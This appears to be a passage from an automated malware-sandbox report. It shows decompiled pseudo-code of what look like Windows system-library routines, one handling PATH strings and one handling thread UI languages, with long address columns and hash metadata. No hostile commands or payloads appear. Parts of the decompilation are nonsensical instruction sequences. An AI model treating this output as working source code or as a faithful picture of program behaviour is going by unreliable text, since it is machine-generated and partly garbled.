											switch( *((intOrPtr*)(_t244 * 4 +  &M01762959))) {
												case 0:
													__ax =  *0x1828488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0177F3E0(__edi,  *0x182848c, __ax & 0x0000ffff);
														__eax =  *0x1828488 & 0x0000ffff;
														goto L26;
													}
													goto L126;
												case 1:
													L45:
													E0177F3E0(_t324, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x1828480 & 0x0000ffff = E0177F3E0(__edi,  *0x1828484,  *0x1828480 & 0x0000ffff);
													__eax =  *0x1828480 & 0x0000ffff;
													__eax = ( *0x1828480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0177F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L126;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0177F3E0(_t324, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t324 = _t324 + (_t270 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t324 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx =  *0x182575c;
													__eflags = __ebx - 0x182575c;
													if(__ebx != 0x182575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0177F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x182575c;
														} while (__ebx != 0x182575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1828478 & 0x0000ffff = E0177F3E0(__edi,  *0x182847c,  *0x1828478 & 0x0000ffff);
													__eax =  *0x1828478 & 0x0000ffff;
													__eax = ( *0x1828478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E017C39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1826e58 & 0x0000ffff = E0177F3E0(__edi,  *0x1826e5c,  *0x1826e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1826e58 & 0x0000ffff;
													__eax = ( *0x1826e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L126;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t322 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01762935))) {
							case 0:
								__ax =  *0x1828488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E01762E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1828480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1828480;
									goto L98;
								}
								goto L14;
							case 3:
								__eax = E0174EEF0(0x18279a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L75();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0174EB70(__ecx, 0x18279a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1827b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01754620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0174EB70(__ecx, 0x18279a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t336;
										_pop(_t282);
										return E0177B640(_t219, _t282, _v8 ^ _t336, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L75();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L126;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t279 = E01762E3E(_t277,  &_v36);
									_t291 = _v36;
									_v76 = _t279;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x1825764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1828478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1828478;
									L98:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1826e58 & 0x0000ffff;
								__eax = ( *0x1826e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L126;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags > 0) {
						asm("o16 sub [esi+0x1], dh");
					}
					_t105 = _t329 + 1;
					 *_t105 =  *(_t329 + 1) - _t311;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags > 0) {
						if (__eflags <= 0) goto L62;
					}
					if(__eflags > 0) {
						_t329 = _t329 + 1;
						__eflags = _t329;
					}
					 *(_t329 + 1) =  *(_t329 + 1) - _t311;
					_t245 = _t244 + 0x1f017626;
					__eflags = _t245;
					if(_t245 == 0) {
						_t245 = _t340;
					}
					 *(_t329 + 1) =  *(_t329 + 1) - _t311;
					_t246 = _t245 ^ 0x02017a5b;
					 *(_t329 + 1) =  *(_t329 + 1) - _t329;
					 *_t246 =  *_t246 - 0x76;
					_t332 = _t329 + _t329;
					__eflags = _t332;
					asm("daa");
					if(_t332 > 0) {
						_push(ds);
					}
					 *((intOrPtr*)(_t332 + 1)) =  *((intOrPtr*)(_t332 + 1)) - _t311;
					_t333 = _t332 - 1;
					_t116 = _t333 + 1;
					 *_t116 =  *(_t333 + 1) - _t311;
					__eflags =  *_t116;
					asm("daa");
					if(__eflags > 0) {
						asm("fcomp dword [ebx+0x7a]");
					}
					if(__eflags == 0) {
						_t246 = 0x28;
					}
					_t118 = _t333 + 1;
					 *_t118 =  *(_t333 + 1) - _t311;
					__eflags =  *_t118;
				}
				L126:
			}








































                                                                              0x01762584
                                                                              0x01762586
                                                                              0x01762590
                                                                              0x01762599
                                                                              0x0176259e
                                                                              0x017625a4
                                                                              0x017625a9
                                                                              0x017625ac
                                                                              0x017625ae
                                                                              0x017625b1
                                                                              0x017625b2
                                                                              0x017625b5
                                                                              0x017625b8
                                                                              0x017625bb
                                                                              0x017625bc
                                                                              0x017625bf
                                                                              0x017625c2
                                                                              0x017625c5
                                                                              0x017625c6
                                                                              0x017625cb
                                                                              0x017625ce
                                                                              0x017625d8
                                                                              0x017625dd
                                                                              0x017625de
                                                                              0x017625e1
                                                                              0x017625e3
                                                                              0x017625e9
                                                                              0x017626da
                                                                              0x017626da
                                                                              0x017626dd
                                                                              0x017626e2
                                                                              0x017a5b56
                                                                              0x00000000
                                                                              0x017626e8
                                                                              0x017626f9
                                                                              0x017626fb
                                                                              0x017626fe
                                                                              0x01762700
                                                                              0x017a5b60
                                                                              0x00000000
                                                                              0x01762706
                                                                              0x01762706
                                                                              0x0176270a
                                                                              0x0176270a
                                                                              0x0176270d
                                                                              0x01762713
                                                                              0x01762716
                                                                              0x01762718
                                                                              0x0176271c
                                                                              0x0176271e
                                                                              0x017a5b6c
                                                                              0x017a5b6f
                                                                              0x017a5b7f
                                                                              0x017a5b89
                                                                              0x017a5b8e
                                                                              0x017a5b93
                                                                              0x017a5b96
                                                                              0x017a5b9c
                                                                              0x017a5ba0
                                                                              0x017a5ba3
                                                                              0x017a5bab
                                                                              0x017a5bb0
                                                                              0x017a5bb3
                                                                              0x017a5bb3
                                                                              0x017a5ba3
                                                                              0x01762724
                                                                              0x01762726
                                                                              0x01762729
                                                                              0x0176272c
                                                                              0x0176279d
                                                                              0x0176279d
                                                                              0x017627a0
                                                                              0x017627a2
                                                                              0x00000000
                                                                              0x0176272e
                                                                              0x0176272e
                                                                              0x01762731
                                                                              0x01762734
                                                                              0x01762734
                                                                              0x01762736
                                                                              0x017a5bc1
                                                                              0x017a5bc1
                                                                              0x017a5bc4
                                                                              0x00000000
                                                                              0x017a5bca
                                                                              0x017a5bca
                                                                              0x017a5bcd
                                                                              0x00000000
                                                                              0x017a5bd3
                                                                              0x00000000
                                                                              0x017a5bd3
                                                                              0x017a5bcd
                                                                              0x0176273c
                                                                              0x0176273c
                                                                              0x01762742
                                                                              0x01762747
                                                                              0x0176274a
                                                                              0x0176274d
                                                                              0x01762750
                                                                              0x00000000
                                                                              0x01762756
                                                                              0x01762756
                                                                              0x00000000
                                                                              0x01762902
                                                                              0x01762908
                                                                              0x0176290b
                                                                              0x00000000
                                                                              0x01762911
                                                                              0x0176291c
                                                                              0x01762921
                                                                              0x00000000
                                                                              0x01762921
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762880
                                                                              0x01762887
                                                                              0x0176288c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762805
                                                                              0x0176280a
                                                                              0x01762814
                                                                              0x01762816
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176281e
                                                                              0x01762821
                                                                              0x01762823
                                                                              0x00000000
                                                                              0x01762829
                                                                              0x01762829
                                                                              0x01762831
                                                                              0x0176283c
                                                                              0x0176283e
                                                                              0x00000000
                                                                              0x0176283e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176284e
                                                                              0x01762850
                                                                              0x01762851
                                                                              0x01762854
                                                                              0x01762857
                                                                              0x0176285a
                                                                              0x0176285c
                                                                              0x0176285d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176275d
                                                                              0x01762761
                                                                              0x00000000
                                                                              0x01762767
                                                                              0x0176276e
                                                                              0x01762773
                                                                              0x01762773
                                                                              0x01762776
                                                                              0x01762778
                                                                              0x0176277e
                                                                              0x0176277e
                                                                              0x01762781
                                                                              0x01762781
                                                                              0x01762783
                                                                              0x01762784
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a5bd8
                                                                              0x017a5bde
                                                                              0x017a5be4
                                                                              0x017a5be6
                                                                              0x017a5be8
                                                                              0x017a5be9
                                                                              0x017a5bee
                                                                              0x017a5bf8
                                                                              0x017a5bff
                                                                              0x017a5c01
                                                                              0x017a5c04
                                                                              0x017a5c07
                                                                              0x017a5c0b
                                                                              0x017a5c0d
                                                                              0x017a5c0d
                                                                              0x017a5c15
                                                                              0x017a5c18
                                                                              0x017a5c1b
                                                                              0x017a5c1b
                                                                              0x017a5c1e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017628c3
                                                                              0x017628c8
                                                                              0x017628d2
                                                                              0x017628d4
                                                                              0x017628d8
                                                                              0x017628db
                                                                              0x017a5c26
                                                                              0x017a5c28
                                                                              0x017a5c2d
                                                                              0x017a5c2d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a5c34
                                                                              0x017a5c36
                                                                              0x017a5c49
                                                                              0x017a5c4e
                                                                              0x017a5c54
                                                                              0x017a5c5b
                                                                              0x017a5c5d
                                                                              0x017a5c60
                                                                              0x01762788
                                                                              0x01762788
                                                                              0x0176278b
                                                                              0x0176278e
                                                                              0x0176278e
                                                                              0x0176278e
                                                                              0x01762791
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762756
                                                                              0x01762750
                                                                              0x00000000
                                                                              0x01762794
                                                                              0x01762794
                                                                              0x01762795
                                                                              0x01762798
                                                                              0x01762798
                                                                              0x00000000
                                                                              0x01762734
                                                                              0x0176272c
                                                                              0x01762700
                                                                              0x017625ef
                                                                              0x017625ef
                                                                              0x017625ef
                                                                              0x017625f2
                                                                              0x017625f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017625fe
                                                                              0x00000000
                                                                              0x017628e6
                                                                              0x017628ec
                                                                              0x017628ef
                                                                              0x017628f5
                                                                              0x017628f8
                                                                              0x017628f8
                                                                              0x00000000
                                                                              0x017628f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762866
                                                                              0x01762866
                                                                              0x01762876
                                                                              0x01762879
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017627e0
                                                                              0x017627e7
                                                                              0x017627e9
                                                                              0x017627eb
                                                                              0x017a5afd
                                                                              0x00000000
                                                                              0x017a5afd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762633
                                                                              0x01762638
                                                                              0x0176263b
                                                                              0x0176263c
                                                                              0x0176263e
                                                                              0x01762640
                                                                              0x01762642
                                                                              0x01762647
                                                                              0x01762649
                                                                              0x0176264e
                                                                              0x01762650
                                                                              0x01762653
                                                                              0x01762659
                                                                              0x017626a2
                                                                              0x017626a7
                                                                              0x017626ac
                                                                              0x017626b2
                                                                              0x017a5b11
                                                                              0x017a5b15
                                                                              0x017a5b17
                                                                              0x00000000
                                                                              0x017626b8
                                                                              0x017626b8
                                                                              0x017626ba
                                                                              0x017627a6
                                                                              0x017627a6
                                                                              0x017627a9
                                                                              0x017627ab
                                                                              0x017627b9
                                                                              0x017627b9
                                                                              0x017627be
                                                                              0x017627c1
                                                                              0x017627c3
                                                                              0x017627c5
                                                                              0x017627c7
                                                                              0x017a5c74
                                                                              0x017a5c79
                                                                              0x017a5c79
                                                                              0x017627c7
                                                                              0x00000000
                                                                              0x017626c0
                                                                              0x017626c0
                                                                              0x017626c3
                                                                              0x017626c6
                                                                              0x017626c6
                                                                              0x017626c9
                                                                              0x017626c9
                                                                              0x00000000
                                                                              0x017626c9
                                                                              0x017626ba
                                                                              0x0176265b
                                                                              0x0176265b
                                                                              0x0176265e
                                                                              0x01762667
                                                                              0x0176266d
                                                                              0x01762677
                                                                              0x0176267c
                                                                              0x0176267f
                                                                              0x01762681
                                                                              0x017a5b49
                                                                              0x017a5b4e
                                                                              0x017627cd
                                                                              0x017627d0
                                                                              0x017627d1
                                                                              0x017627d2
                                                                              0x017627d4
                                                                              0x017627dd
                                                                              0x01762687
                                                                              0x01762687
                                                                              0x0176268a
                                                                              0x0176268b
                                                                              0x0176268e
                                                                              0x0176268f
                                                                              0x01762691
                                                                              0x01762696
                                                                              0x01762698
                                                                              0x0176269d
                                                                              0x0176269f
                                                                              0x00000000
                                                                              0x0176269f
                                                                              0x01762681
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762846
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762605
                                                                              0x0176260a
                                                                              0x0176260c
                                                                              0x01762611
                                                                              0x01762616
                                                                              0x01762619
                                                                              0x01762619
                                                                              0x0176261e
                                                                              0x00000000
                                                                              0x01762624
                                                                              0x01762627
                                                                              0x01762627
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a5b1f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762894
                                                                              0x0176289b
                                                                              0x0176289d
                                                                              0x017628a1
                                                                              0x017a5b2b
                                                                              0x017a5b2e
                                                                              0x017a5b2e
                                                                              0x017628a7
                                                                              0x017628a9
                                                                              0x017a5b04
                                                                              0x017a5b09
                                                                              0x017a5b09
                                                                              0x017a5b09
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a5b35
                                                                              0x017a5b3c
                                                                              0x017628fb
                                                                              0x017628fb
                                                                              0x017626cc
                                                                              0x017626cc
                                                                              0x017626d0
                                                                              0x00000000
                                                                              0x017626d2
                                                                              0x017626d2
                                                                              0x00000000
                                                                              0x017626d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017625fe
                                                                              0x0176292d
                                                                              0x0176292d
                                                                              0x01762930
                                                                              0x01762935
                                                                              0x01762937
                                                                              0x01762939
                                                                              0x01762939
                                                                              0x0176293a
                                                                              0x0176293a
                                                                              0x0176293a
                                                                              0x0176293d
                                                                              0x0176293f
                                                                              0x01762941
                                                                              0x01762941
                                                                              0x01762942
                                                                              0x01762945
                                                                              0x01762945
                                                                              0x01762945
                                                                              0x01762946
                                                                              0x01762949
                                                                              0x01762949
                                                                              0x0176294f
                                                                              0x01762951
                                                                              0x01762951
                                                                              0x01762952
                                                                              0x01762955
                                                                              0x0176295a
                                                                              0x0176295d
                                                                              0x01762960
                                                                              0x01762960
                                                                              0x01762962
                                                                              0x01762963
                                                                              0x01762965
                                                                              0x01762965
                                                                              0x01762966
                                                                              0x01762969
                                                                              0x0176296a
                                                                              0x0176296a
                                                                              0x0176296a
                                                                              0x0176296e
                                                                              0x0176296f
                                                                              0x01762971
                                                                              0x01762971
                                                                              0x01762973
                                                                              0x01762975
                                                                              0x01762975
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PATH
                                                                              • API String ID: 0-1036084923
                                                                              • Opcode ID: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                              • Instruction ID: 03d357e5aa6c5c6402f02df7a2fcf14a97e0051d8816305002376e01b5852c9b
                                                                              • Opcode Fuzzy Hash: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                              • Instruction Fuzzy Hash: 89C1AE71E00219DBDB65DFA9D880BADFBB9FF48700F448029EA01BB255D738A941CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E0176FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0174EEF0(0x1827b60);
					_t134 =  *0x1827b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1827b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1827b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01746D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E017D8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0173B150();
													}
													_t116 = E017D6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017475CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1828638; // 0x0
																	_t122 = L017438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017476E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017476E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0176FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0176FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0176FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0176FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0176FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0176FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1827b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1827b84 = _t75;
						_t73 = E0174EB70(_t134, 0x1827b60);
						if( *0x1827b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0174FF60( *0x1827b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                              0x0176fab0
                                                                              0x0176fab2
                                                                              0x0176fab3
                                                                              0x0176fab4
                                                                              0x0176fabc
                                                                              0x0176fac0
                                                                              0x0176fb14
                                                                              0x0176fb17
                                                                              0x0176fac2
                                                                              0x0176fac8
                                                                              0x0176facd
                                                                              0x0176fad3
                                                                              0x0176fad3
                                                                              0x0176fadd
                                                                              0x0176fb18
                                                                              0x0176fb1b
